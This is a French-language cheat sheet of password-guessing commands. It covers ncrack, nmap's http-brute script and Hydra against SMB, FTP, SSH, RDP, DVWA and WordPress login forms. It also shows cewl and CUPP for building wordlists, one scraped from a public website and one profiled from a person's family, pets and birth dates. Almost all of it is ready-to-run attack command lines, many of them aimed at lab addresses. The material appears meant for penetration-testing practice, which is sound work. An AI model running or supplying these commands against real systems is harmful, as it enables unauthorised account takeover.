Essayer les mots de passe du fichier rockyou.txt pour se connecter au partage
ncrack -u username -P rockyou.txt -T 5 192.168.2.2 -p smb -v
Se créer un dictionnaire de mots de passe avec le mots-clés d’un site internet
cewl -d 2 -m 5 -w mylist.txt https://www.searchevolution.com
Se créer un dictionnaire personnalisé pour un usager (mots de passe basé sur le nom des enfants, femmes, animaux de compagnie, date de naissance, etc.)
<a href="https://github.com/Mebus/cupp">CUPP – Common User Passwords Profiler</a>
Essayer de cracker la sécurité HTTP avec la force brute
## HTTP brute force a protected directory. Auditing against http basic, digest and ntlm authentication.
## This script uses the unpwdb and brute libraries to perform password guessing
nmap -p80 --script http-brute --script-args http-brute.path=/printers/ 192.168.x.x
Hydra supporte une multitude de protocole et peut forcer la connexion en utilisant une liste de mots de passe. Voici les protocoles supportés par Hydra
- TELNET
- FTP
- HTTP(S)
- HTTP-PROXY
- SMB
- SMBNT
- MSSQL
- MySQL
- REXEC
- IRC
- RSH
- RLOGIN
- CVS
- SNMP
- SMTP
- SOCKS5
- VNC
- POP3
- IMAP
- NNTP
- PCNFS
- XMPP
- ICQ
- SAP/R3
- LDAP2
- LDAP3
- POSTGRES
- TEAMSPEAK
- CISCO AUTH
- CISCO ENABLE
- AFP
- SUBVERSION/SVN
- FIReBIRD
- CISCO AAA
hydra -L users.txt -P pass.txt 192.168.0.114 ssh
hydra -l admin -P /usr/share/dirb/wordlists/small.txt 192.168.1.101 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V
Si on veut retouver le nom d’un usager wordpress
hydra -L ~/hydra-attaques/names.txt -p patate 10.10.128.147 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.128.147%2Fwp-admin%2F&testcookie=1:Invalid username" -V
Si on veut retrouver un mot de passe par la force brute avec wordpress
hydra -l Elliot -P test.dic 10.10.128.147 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you entered for the username" -t 30
Essayer de se connecter à un serveur ftp avec une liste de mots de passe
ncrack -u germain -P dict.txt ftp://ftp.test.com (-U pour spécifier une liste d'usagers)
Tentative de trouver un mot de passe RDP
hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://192.168.34.16